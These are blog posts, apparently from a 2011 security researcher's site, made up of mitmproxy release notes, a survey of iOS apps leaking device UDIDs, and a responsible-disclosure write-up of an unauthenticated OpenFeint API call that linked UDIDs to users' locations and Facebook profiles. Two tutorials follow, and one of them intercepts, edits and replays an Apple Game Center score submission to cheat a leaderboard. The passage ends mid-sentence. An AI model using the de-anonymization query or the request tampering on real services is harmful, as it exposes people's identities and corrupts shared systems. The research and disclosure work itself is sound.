<td class="no"> No </td>
</tr>
<tr>
<th><a href="http://www.scoreloop.com/">Scoreloop</a></th>
<td class="yes"> Email address, gender, username, nationality, friends </td>
<td class="yes"> Yes </td>
<td class="yes"> Access private Facebook and Twitter friends lists </td>
</tr>
<tr>
<th><a href="http://plusplus.com/">Plus+</a></th>
<td class="yes"> Username </td>
<td class="no"> No </td>
<td class="no"> No </td>
</tr>
<tr>
<th><a href="http://www.zynga.com/">Zynga</a></th>
<td class="yes"> First name, username, friends*, in-game messages*,
mobile number*</td>
<td class="yes"> Yes* </td>
<td class="no"> No </td>
</tr>
</table>
<p>* The starred Zynga findings rely on the fact that other networks can be used
to obtain the user's email address using the UDID.</p>
<p>There are two caveats to keep in mind while considering these results. First,
the findings are based on the default settings for each social network - some
networks may have settings that reduce the amount of information exposed.
Second, some of the data leaked is optional - for instance, it's not mandatory
for a user to link Facebook or Twitter accounts with any of the networks.</p>
<p>All the affected companies and Apple were notified 5 weeks ago. The Crystal and
Scoreloop teams have both repaired the problems that could lead to a follow-on
compromise of a user's social network accounts. At the time of writing, it is
still possible to log in as a user using only a UDID on five of the vulnerable
networks.</p>
<h2 id="the-future">The future</h2>
<p>A few days after I notified the companies involved, it was revealed that Apple
was <a href="http://techcrunch.com/2011/08/19/apple-ios-5-phasing-out-udid/">quietly killing the UDID
API</a>. It will
still be present in IOS5, but is marked deprecated, and will probably be
removed in future. I recommend that developers shift away from using UDIDs now,
rather than wait for formal removal of the API.</p>
<p>We can now expect a frenzy of activity as developers look for alternatives. The
challenge will be to make sure that the cure isn't as bad as the disease -
Apple's recommendation to "create a unique identifier specific to your app"
could tempt developers to replicate the UDID mechanism on a smaller scale,
flaws and all. Expect more blog posts on this topic soon.</p>
mitmproxy 0.6
2011-08-07T00:00:00+00:00
2011-08-07T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_6/
<div class="media">
<a href="../mitmproxy_0_4.png">
<img src="../mitmproxy_0_4.png" />
</a>
</div>
<p>I'm happy to announce the release of mitmproxy 0.6, featuring a redesigned
scripting API, slew of major new features and a panoply of small bugfixes and
improvements.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>New scripting API that allows much more flexible and fine-grained
rewriting of traffic. See the docs for more info.</li>
<li>Support for gzip and deflate content encodings. A new "z"
keybinding in mitmproxy to let us quickly encode and decode content, plus
automatic decoding for the "pretty" view mode.</li>
<li>An event log, viewable with the "v" shortcut in mitmproxy, and the "-e"
commandline argument in both mitmproxy and mitmdump.</li>
<li>Huge performance improvements both in the mitmproxy interface, and loading
large numbers of flows from file.</li>
<li>A new "replace" convenience method for all flow objects, that does a
universal regex-based string replacement.</li>
<li>Header management has been rewritten to maintain both case and order.</li>
<li>Improved stability for SSL interception.</li>
<li>Default expiry time on generated SSL certs has been dropped to avoid an
OpenSSL overflow bug that caused certificates to expire in the distant
past on some systems.</li>
<li>A "pretty" view mode for JSON and form submission data.</li>
<li>Expanded documentation and examples.</li>
<li>Many other small improvements and bugfixes.</li>
</ul>
mitmproxy 0.5
2011-06-27T00:00:00+00:00
2011-06-27T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_5/
<div class="media">
<a href="../mitmproxy_0_4.png">
<img src="../mitmproxy_0_4.png" />
</a>
</div>
<p>I've just tagged and released mitmproxy 0.5. Everyone should update - this
release squelches a few annoying performance killers. You can download it from
the project website:</p>
<h2 id="mitmproxy-org"><a href="http://mitmproxy.org">mitmproxy.org</a></h2>
<h2 id="changelog">Changelog</h2>
<ul>
<li>An -n option to start the tools without binding to a proxy port.</li>
<li>Allow scripts, hooks, sticky cookies etc. to run on flows loaded from
save files.</li>
<li>Regularize command-line options for mitmproxy and mitmdump.</li>
<li>Add an "SSL exception" to mitmproxy's license to remove possible
distribution issues.</li>
<li>Add a --cert-wait-time option to make mitmproxy pause after a new SSL
certificate is generated. This can pave over small discrepancies in
system time between the client and server.</li>
<li>Handle viewing big request and response bodies more elegantly. Only
render the first 100k of large documents, and try to avoid running the
XML indenter on non-XML data.</li>
<li><strong>BUGFIX</strong>: Make the "revert" keyboard shortcut in mitmproxy work after a
flow has been replayed.</li>
<li><strong>BUGFIX</strong>: Repair a problem that sometimes caused SSL connections to consume
100% of CPU.</li>
</ul>
UDID media roundup
2011-06-10T00:00:00+00:00
2011-06-10T00:00:00+00:00
https://corte.si/posts/security/udid-media-roundup/
<p>After a hectic month, I'm finally able to return to the UDID privacy issues I
covered in my last few blog posts. I plan to publish some further results soon,
but first, a quick roundup of the media coverage of the <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">OpenFeint UDID
de-anonymization
result</a>.</p>
<ul>
<li><a href="http://blogs.wsj.com/digits/2011/05/11/the-privacy-risks-of-id-codes-in-your-apps/">A post on on the Wall Street Journal tech
blog</a>
by <a href="http://www.jennifervalentinodevries.com/">Jennifer Valentino-DeVries</a>, one
of the very few journalists who do good, novel investigative work into issues
like UDID privacy.</li>
<li>An interview with <a href="http://www.repubblica.it/tecnologia/2011/06/03/news/identificativo_iphone-17073898/">La
Repubblica</a>,
a major Italian daily.</li>
<li>An article in <a href="http://www.spiegel.de/netzwelt/gadgets/0,1518,761735,00.html">Der Spiegel</a>.</li>
<li>Coverage on <a href="http://articles.cnn.com/2011-05-09/tech/identity.iphones.ipads_1_apps-identifier-privacy?_s=PM:TECH">CNN
online</a>,
<a href="http://www.wired.com/gadgetlab/2011/05/iphone-udid/">Wired Gadgetlab</a> and the
<a href="http://www.huffingtonpost.com/2011/05/10/iphone-udid-personal-information-identity_n_860139.html">Huffington
Post</a>.</li>
<li>And, last but not least, a <a href="http://netsecpodcast.com/?p=772">nice 30-minute
interview</a> with <a href="https://twitter.com/#!/quine">Zach
Lanier</a> from the <a href="http://netsecpodcast.com/">Network Security
Podcast</a>. This is your opportunity to get some more
details on the OpenFeint issue and find out what a a weird accent I have.</li>
</ul>
<p>The issue was also mentioned on many, many blogs and smaller publications.</p>
How UDIDs are used: a survey
2011-05-19T00:00:00+00:00
2011-05-19T00:00:00+00:00
https://corte.si/posts/security/apple-udid-survey/
<p>I recently published some
<a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">research</a> showing
that the OpenFeint social gaming network can be used to link Apple UDIDs to
users' real-world identities. To understand why this is a problem, we have to
look at the way UDIDs are used in the broader app ecosystem. Once we do this, we
see that the vast majority of applications send UDIDs to servers on the
Internet, and that UDID-linked user information is aggregated in literally
thousands of databases on the net. In this context, UDID de-anonymization is a
serious threat to user privacy.</p>
<p>We have one good research paper surveying UDID use - in 2010, Eric Smith <a href="http://www.pskl.us/wp/?p=476">looked
at the unencrypted portion of app traffic</a>, and
found that 68% of tested apps send UDIDs upstream in the clear. I was curious to
see what the figures would look like if encrypted (HTTPS) traffic was included,
so I decided to do my own survey, using <a href="http://mitmproxy.org">mitmproxy</a> to
analyse all traffic from the 94 applications I had installed on my iPhone. Below
is a set of graphs highlighting the main facts. I've also published a list of
all applications and the domains they contacted <a href="https://corte.si/posts/security/apple-udid-survey/appdomains.html">here</a> - it
makes for interesting reading.</p>
<h2 id="apps-are-noisier-than-you-think-they-are">Apps are noisier than you think they are</h2>
<div class="media">
<a href="all_domains.png">
<img src="all_domains.png" />
</a>
</div>
<p>84% of apps tested contacted one or more domains during use. At the extreme end,
<a href="http://itunes.apple.com/us/app/idestroy-wicked-sick-stress/id309689677?mt=8">iDestroy</a>
contacted 14 domains, including 3 different ad networks and OpenFeint.</p>
<h2 id="and-send-your-udid-to-more-places-than-you-expect">... and send your UDID to more places than you expect</h2>
<div class="media">
<a href="udid_domains.png">
<img src="udid_domains.png" />
</a>
</div>
<p>74% of apps tested sent the device UDID to one or more domains.</p>
<h2 id="often-without-encryption">... often without encryption</h2>
<div class="media">
<a href="udid_scheme.png">
<img src="udid_scheme.png" />
</a>
</div>
<p>46% of apps that transmitted UDIDs did so in the clear. 54% of apps
transmitting UDIDs used encryption for all UDID traffic<sup class="footnote-reference"><a href="#1">1</a></sup>.</p>
<h2 id="a-few-big-udid-aggregators-dominate">A few big UDID aggregators dominate</h2>
<div class="media">
<a href="topdomains.png">
<img src="topdomains.png" />
</a>
</div>
<p>Three big aggregators of UDID-related data dominate: <a href="http://apple.com">Apple</a>,
<a href="http://www.flurry.com">Flurry</a>, and <a href="http://www.openfeint.com">OpenFeint</a>. Each
one of these companies has the vast majority of UDIDs on file, linked to a rich
set of privacy-sensitive information. OpenFeint's ubiquity is one of the reasons
why UDID de-anonymization using their API is so serious.</p>
<h2 id="behind-them-are-a-long-tail-of-smaller-aggregators">... behind them are a long tail of smaller aggregators</h2>
<p>Here is a list of all the remaining domains that had UDIDs transmitted to them - a
mixture of ad networks, analytics firms, individual developer sites, and
online services.</p>
<table>
<tr>
<td> ads.mp.mydas.mobi </td>
<td> analytics.localytics.com </td>
<td> api.dropbox.com </td>
</tr>
<tr>
<td> bayobongo.com </td>
<td> bbc.112.2o7.net </td>
<td> beatwave.collect3.com.au </td>
</tr>
<tr>
<td> catalog.lexcycle.com </td>
<td> data.mobclix.com </td>
<td> init.gc.apple.com </td>
</tr>
<tr>
<td> msh.amazon.com </td>
<td> notifications.lexcycle.com </td>
<td> promo.limbic.com </td>
</tr>
<tr>
<td> soma.smaato.com </td>
<td> www.chimerasw.com </td>
<td> www.phasiclabs.com </td>
</tr>
<tr>
<td> www.trainyard.ca </td>
<td> api.twitter.com </td>
<td> ngpipes.ngmoco.com </td>
</tr>
<tr>
<td> npr.122.2o7.net </td>
<td> ws.tapjoyads.com </td>
<td> </td>
</tr>
</table>
<h2 id="methodology">Methodology</h2>
<p>For each application, I started a logging instance of mitmdump, like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">mitmdump -w</span><span style="color:#c0c5ce;"> appname
</span></code></pre>
<p>I then started up the application, interacted with anything that might elicit
network traffic, and shut it down. The collected data was analyzed with a simple
script, that used the <a href="http://mitmproxy.org/doc/library.html">libmproxy</a> API to
traverse the traffic dumps and extract the needed information.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>The fact that 54% of UDID-using apps would have gone undetected by
Smith's study seems to indicate that there should be a much greater difference
between our results - Smith found 68% of apps use UDIDs vs my 74%. The
discrepancy can be accounted for by the fact that we used different samples -
Smith used predominantly applications in Apple's "Top Free" lists, whereas I
used both paid and unpaid applications that happened to be on my phone.</p>
</div>
De-anonymizing Apple UDIDs with OpenFeint
2011-05-04T00:00:00+00:00
2011-05-04T00:00:00+00:00
https://corte.si/posts/security/openfeint-udid-deanonymization/
<p>Every iPhone, iPad and iPod touch has an associated Unique Device Identifier
(UDID). You can think of the UDID as a serial number burned into the device -
one that can't be removed or changed<sup class="footnote-reference"><a href="#1">1</a></sup>. This number is exposed to app
developers through an API, without requiring the device owner's permission or
knowledge.</p>
<p>Few Apple users realise just how widely their UDIDs are used. <a href="http://www.pskl.us/wp/?p=476">Research
shows</a> that 68% of apps silently send UDIDs to
servers on the Internet. This is often accompanied by information on how, when
and where the device is used. The most common destination for traffic
containing a user's UDID is Apple itself, followed by the
<a href="http://www.flurry.com/">Flurry</a> mobile analytics network and OpenFeint, a
mobile social gaming company. These companies are uber-aggregators of
UDID-linked user information, because so many apps use their APIs. Trailing
behind the big three are thousands of individual developer sites, ad servers and
smaller analytics firms. Users have no way to stop their device from offering up
their UDID, telling who their data is being sent to, or even telling that it's
happening at all. This situation has caused wide-spread concern, including
coverage in the <a href="http://blogs.wsj.com/digits/2010/12/19/unique-phone-id-numbers-explained/">Wall Street
Journal</a>,
and <a href="http://www.txinjuryblog.com/tags/udid-lawsuit/">two</a>
<a href="http://www.infosecurity-us.com/view/15643/apple-faces-second-lawsuit-over-udid-disclosure-to-third-parties/">lawsuits</a>
aimed at Apple.</p>
<p>The saving grace is that your device UDID is not linked to your real-world
identity. If it were possible to de-anonymize UDIDs, the result would be a
serious privacy breach. Apple is well aware of this, and <a href="http://developer.apple.com/library/ios/#documentation/uikit/reference/UIDevice_Class/Reference/UIDevice.html">explicitly tells
developers that they are not permitted to publicly link a UDID to a user
account</a>.</p>
<p>I recently published a tool called <a href="http://mitmproxy.org">mitmproxy</a>, a
man-in-the-middle proxy that allows one to intercept and monitor SSL-encrypted
HTTP traffic. Using mitmproxy to view the encrypted traffic sent by my own iOS
devices, I was able to observe protocols and data flows that have clearly
received very little external review. A slew of interesting security results
followed (keep an eye on this blog), but by far the most alarming was the fact
that it was possible to use OpenFeint to completely de-anonymize a large
proportion of UDIDs.</p>
<h2 id="de-anonymizing-udids-with-openfeint">De-anonymizing UDIDs with OpenFeint</h2>
<h3 id="linking-udids-to-openfeint-user-accounts">Linking UDIDs to OpenFeint user accounts</h3>
<p>When an OpenFeint-enabled app is first fired up, it submits the device's UDID to
OpenFeint's servers, which then return a list of associated accounts:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">https://api.openfeint.com/users/for_device.xml?udid=XXX
</span></code></pre>
<p>This is a completely unauthenticated call - you can try it out by cutting and
pasting it into your browser, replacing XXX with <a href="http://support.apple.com/kb/HT4061">your own
UDID</a>. Here's an example of the response for
my UDID, with sensitive information removed:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><?</span><span style="color:#bf616a;">xml </span><span style="color:#d08770;">version</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">1.0</span><span style="color:#c0c5ce;">" </span><span style="color:#d08770;">encoding</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">UTF-8</span><span style="color:#c0c5ce;">"?>
<</span><span style="color:#bf616a;">resources</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">user</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">chat_enabled</span><span style="color:#c0c5ce;">>true</</span><span style="color:#bf616a;">chat_enabled</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">gamer_score</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">gamer_score</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">id</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">id</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">last_played_game_id</span><span style="color:#c0c5ce;">>187402</</span><span style="color:#bf616a;">last_played_game_id</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">last_played_game_name</span><span style="color:#c0c5ce;">>tiny wings</</span><span style="color:#bf616a;">last_played_game_name</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">lat</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">lat</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">lng</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">lng</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">online</span><span style="color:#c0c5ce;">>false</</span><span style="color:#bf616a;">online</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">profile_picture_source</span><span style="color:#c0c5ce;">>FbconnectCredential</</span><span style="color:#bf616a;">profile_picture_source</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">profile_picture_updated_at</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">profile_picture_updated_at</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">profile_picture_url</span><span style="color:#c0c5ce;">>http://XXX>
<</span><span style="color:#bf616a;">uploaded_profile_picture_content_type </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">true</span><span style="color:#c0c5ce;">">
</</span><span style="color:#bf616a;">uploaded_profile_picture_content_type</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">uploaded_profile_picture_file_name </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">true</span><span style="color:#c0c5ce;">">
</</span><span style="color:#bf616a;">uploaded_profile_picture_file_name</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">uploaded_profile_picture_file_size </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">true</span><span style="color:#c0c5ce;">">
</</span><span style="color:#bf616a;">uploaded_profile_picture_file_size</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">uploaded_profile_picture_updated_at </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">true</span><span style="color:#c0c5ce;">">
</</span><span style="color:#bf616a;">uploaded_profile_picture_updated_at</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">name</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">name</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">user</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">resources</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>Included is my latitude and longitude, the last game I played, my chosen
account name, and my Facebook profile picture URL.</p>
<h2 id="linking-udids-to-gps-co-ordinates">Linking UDIDs to GPS co-ordinates</h2>
<p>If the user has opted to allow OpenFeint to use their location, latitude and
longitude is returned in the profile results. This lets us trivially associate
a UDID with GPS co-ordinates.</p>
<p><em>The location leak was fixed by OpenFeint after my report. Although some
portions of the OpenFeint API still returns a user location, it seems that it
is no longer served for direct profile requests.</em></p>
<h2 id="linking-udids-to-facebook-profiles">Linking UDIDs to Facebook profiles</h2>
<p>If the user registered a Facebook account with OpenFeint, a profile picture URL
hosted by the Facebook CDN was returned in the user's profile data. Facebook
profile picture URLs include the user's Facebook ID, directly linking it to
their Facebook account.</p>
<p>For example, here's Bruce Schneier's Facebook profile picture URL:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">http://profile.ak.fbcdn.net/hprofile-ak-snc4/41795_60615378024_8092_n.jpg
</span></code></pre>
<p>The 11-digit number in this URL is his Facebook user ID. We can now view his
profile using a URL like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">http://www.facebook.com/profile.php?id=60615378024
</span></code></pre>
<p>This final step represents a complete de-anonymization of the UDID, directly
linking the supposedly anonymous identifier with a user's real-world identity.</p>
<p><em>The Facebook ID leak was fixed by OpenFeint after my report.</em></p>
<h2 id="openfeint-s-response">OpenFeint's response</h2>
<p>I reported this problem to OpenFeint on 5th of April. I did not hear back from
them immediately, but I knew they were working on the problem because their API
stopped returning GPS coordinates and Facebook profile picture URLs. On the
12th, I received an email from Jason Citron, OpenFeint's CEO, who wanted to set
up a phone conversation with me, him and an OpenFeint legal representative. We
spoke on the evening of the 20th of April. I recapped my findings and expressed
concern that their API still linked UDIDs to user accounts. They thanked me for
the vulnerability report, confirmed that they had tightened their API in
response to it, and asked for more time to consider the issue before I released
anything. The following morning, it was announced that OpenFeint had been
<a href="http://openfeint.com/company/press/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users">bought by GREE for $104
million</a>.</p>
<p>Last week I received what I assume is OpenFeint's last word on the matter, in
the form of an email from Jason Citron: "We will continue to pay attention to
the issues you raised and will continue to adjust our practices as necessary."
At the time of writing, OpenFeint's API still allows you to associate a UDID
with a private user information.</p>
<h2 id="impact">Impact</h2>
<p>Testing with a small corpus of UDIDs gathered from my own and friends' devices,
I was able to link roughly 30% of UDIDs to GPS co-ordinates, 20% of users to a
weak identity (e.g. OpenFeint profile picture, user-chosen account name), and
10% of UDIDs directly to a Facebook profile. I stress that my sample was small
and probably unrepresentative - only OpenFeint knows what the real numbers are.
None the less, we can make a broad guess at the magnitude of the problem, based
on the fact that OpenFeint <a href="http://openfeint.com/company/press/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users">claims to have 75 million
users</a>:</p>
<ul>
<li>This would mean that about 7.5 million users may have had Facebook accounts
linked publicly to their UDIDs until OpenFeint stopped returning profile
picture URLs a few weeks ago.</li>
<li>About 22.5 million users may have had GPS co-ordinates linked publicly to
their UDIDs until the issue was corrected.</li>
<li>About 15 million users may still have identifying information like profile
pictures and user-chosen account names (that can often be used to identify
users) exposed.</li>
<li>All 75 million users still have personal details like the last
OpenFeint-enabled game they played and whether they are online (i.e. logged in
to the OpenFeint network) exposed.</li>
</ul>
<p>Although the Facebook and GPS de-anonymization issues have been repaired, we
have to consider the possibility that these vulnerabilities have already been
used to de-anonymize a database of UDIDs.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I want to stress that the problem here is not primarily with OpenFeint. By
designing an API to expose UDIDs and encouraging developers to use it, Apple
has ensured that there are literally thousands of databases linking UDIDs to
sensitive user information on the net. A leak from any one of these - or worse
a large-scale de-anonymization like the OpenFeint one - inevitably has serious
consequences for user privacy.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>I should note that this is not quite accurate. The UDID is actually a
computed value - a hash calculated over a set of identifying hardware
attributes. In a sense, it only really exists as an API call.</p>
</div>
mitmproxy: A 30-second client playback example
2011-03-31T00:00:00+00:00
2011-03-31T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/tute-30-seconds/
<p><a href="https://corte.si/posts/code/mitmproxy/announce0_4/">Yesterday</a> I published version 0.4 of
<a href="http://mitmproxy.org">mitmproxy</a> - an intercepting proxy for HTTP/S traffic.
The tool already has pretty complete documentation, but I've decided to write a
series of less formal tutorials to showcase its abilities. Below is the first,
and simplest, of these - keep an eye on the blog for more in the coming days.</p>
<h2 id="a-30-second-client-playback-example">A 30-second client playback example</h2>
<p>My local cafe is serviced by a rickety and unreliable wireless network,
generously sponsored with ratepayers' money by our city council. After
connecting, you are redirected to an SSL-protected page that prompts you for a
username and password. Once you've entered your details, you are free to enjoy
the intermittent dropouts, treacle-like speeds and incorrectly configured
transparent proxy.</p>
<p>I tend to automate this kind of thing at the first opportunity, on the theory
that time spent now will be more than made up in the long run. In this case, I
might use <a href="http://getfirebug.com/">Firebug</a> to ferret out the form post
parameters and target URL, then fire up an editor to write a little script
using Python's <a href="http://docs.python.org/library/urllib.html">urllib</a> to simulate
a submission. That's a lot of futzing about. With mitmproxy we can do the job
in literally 30 seconds, without having to worry about any of the details.
Here's how.</p>
<h3 id="1-run-mitmdump-to-record-our-http-conversation-to-a-file">1. Run mitmdump to record our HTTP conversation to a file.</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> mitmdump </span><span style="color:#bf616a;">-w</span><span style="color:#c0c5ce;"> wireless-login
</span></code></pre><h3 id="2-point-your-browser-at-the-mitmdump-instance">2. Point your browser at the mitmdump instance.</h3>
<p>I use a tiny Firefox addon called <a href="https://addons.mozilla.org/en-us/firefox/addon/toggle-proxy-51740/">Toggle
Proxy</a> to
switch quickly to and from mitmproxy. I'm assuming you've already <a href="http://mitmproxy.org/doc/ssl.html">configured
your browser with mitmproxy's SSL certificate
authority</a>.</p>
<h3 id="3-log-in-as-usual">3. Log in as usual.</h3>
<p>And that's it! You now have a serialized version of the login process in the
file wireless-login, and you can replay it at any time like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> mitmdump </span><span style="color:#bf616a;">-c</span><span style="color:#c0c5ce;"> wireless-login
</span></code></pre><h2 id="embellishments">Embellishments</h2>
<p>We're really done at this point, but there are a couple of embellishments we
could make if we wanted. I use <a href="http://wicd.sourceforge.net/">wicd</a> to
automatically join wireless networks I frequent, and it lets me specify a
command to run after connecting. I used the client replay command above and
voila! - totally hands-free wireless network startup.</p>
<p>We might also want to prune requests that download CSS, JS, images and so forth.
These add only a few moments to the time it takes to replay, but they're not
really needed and I somehow feel compelled trim them anyway. So, we fire up the
mitmproxy console tool on our serialized conversation, like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> mitmproxy </span><span style="color:#bf616a;">wireless-login
</span></code></pre>
<p>We can now go through and manually delete (using the <strong>d</strong> keyboard shortcut)
everything we want to trim. When we're done, we use <strong>S</strong> to save the
conversation back to the file.</p>
mitmproxy: Breaking Apple's Game Center with replay
2011-03-31T00:00:00+00:00
2011-03-31T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/tute-gamecenter/
<p>This is the second in the series of tutorials I'm writing for
<a href="http://mitmproxy.org">mitmproxy</a>. You can find the first one - a 30 second
tutorial on client replay - <a href="https://corte.si/posts/code/mitmproxy/tute-30-seconds/">here</a>.
There will be more to come in the next few days.</p>
<h2 id="the-setup">The setup</h2>
<p>In this tutorial, I'm going to show you how simple it is to creatively interfere
with Apple Game Center traffic using mitmproxy. To set things up, I registered
my mitmproxy CA certificate with my iPhone - there's a <a href="http://mitmproxy.org/doc/certinstall/ios.html">step by step set of
instructions</a> for doing this in
the mitmproxy docs. I then started mitmproxy on my desktop, and configured the
iPhone to use it as a proxy.</p>
<h2 id="taking-a-look-at-the-game-center-traffic">Taking a look at the Game Center traffic</h2>
<p>Lets take a first look at the Game Center traffic. The game I'll use in this
tutorial is <a href="http://itunes.apple.com/us/app/super-mega-worm/id388541990?mt=8">Super Mega
Worm</a> - a great
little retro-apocalyptic sidescroller for the iPhone:</p>
<div class="media">
<a href="supermega.png">
<img src="supermega.png" />
</a>
</div>
<p>After finishing a game (take your time), watch the traffic flowing through
mitmproxy:</p>
<div class="media">
<a href="one.png">
<img src="one.png" />
</a>
</div>
<p>We see a bunch of things we might expect - initialisation, the retrieval of
leaderboards and so forth. Then, right at the end, there's a POST to this
tantalising URL:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">https://service.gc.apple.com/WebObjects/GKGameStatsService.woa/wa/submitScore
</span></code></pre>
<p>The contents of the submission are particularly interesting:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><</span><span style="color:#bf616a;">plist </span><span style="color:#d08770;">version</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">1.0</span><span style="color:#c0c5ce;">">
<</span><span style="color:#bf616a;">dict</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>category</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">string</span><span style="color:#c0c5ce;">>SMW_Adv_USA1</</span><span style="color:#bf616a;">string</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>score-value</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>55</</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>timestamp</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>1301553284461</</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">dict</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">plist</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>This is a <a href="http://en.wikipedia.org/wiki/Property_list">property list</a>,
containing an identifier for the game, a score (55, in this case), and a
timestamp. Looks pretty simple to mess with.</p>
<h2 id="modifying-and-replaying-the-score-submission">Modifying and replaying the score submission</h2>
<p>Lets edit the score submission. First, select it in mitmproxy, then press
<strong>enter</strong> to view it. Make sure you're viewing the request, not the response -
you can use <strong>tab</strong> to flick between the two. Now press <strong>e</strong> for edit. You'll
be prompted for the part of the request you want to change - press <strong>b</strong> for
body. Your preferred editor (taken from the EDITOR environment variable) will
now fire up. Lets bump the score up to something a bit more ambitious:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><</span><span style="color:#bf616a;">plist </span><span style="color:#d08770;">version</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">1.0</span><span style="color:#c0c5ce;">">
<</span><span style="color:#bf616a;">dict</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>category</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">string</span><span style="color:#c0c5ce;">>SMW_Adv_USA1</</span><span style="color:#bf616a;">string</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>score-value</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>2200272667</</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>timestamp</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>1301553284461</</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">dict</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">plist</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>Save the file and exit your editor.</p>
<p>The final step is to replay this modified request. Simply press <strong>r</strong> for
replay.</p>
<h2 id="the-glorious-result-and-some-intrigue">The glorious result and some intrigue</h2>
<div class="media">
<a href="leaderboard.png">
<img src="leaderboard.png" />
</a>
</div>
<p>And that's it - according to the records, I am the greatest Super Mega Worm
player of all time.</p>
<p>Curiously, the top competitors' scores are all the same: 2,147,483,647. If you
think that number seems familiar, you're right: it's 2^31-1, the maximum value
you can fit into a signed 32-bit int. Now let me tell you another peculiar
thing about Super Mega Worm - at the end of every game, it submits your highest
previous score to the Game Center, not your current score. This means that it
stores your highscore somewhere, and I'm guessing that it reads that stored
score back into a signed integer. So, if you <em>were</em> to cheat by the relatively
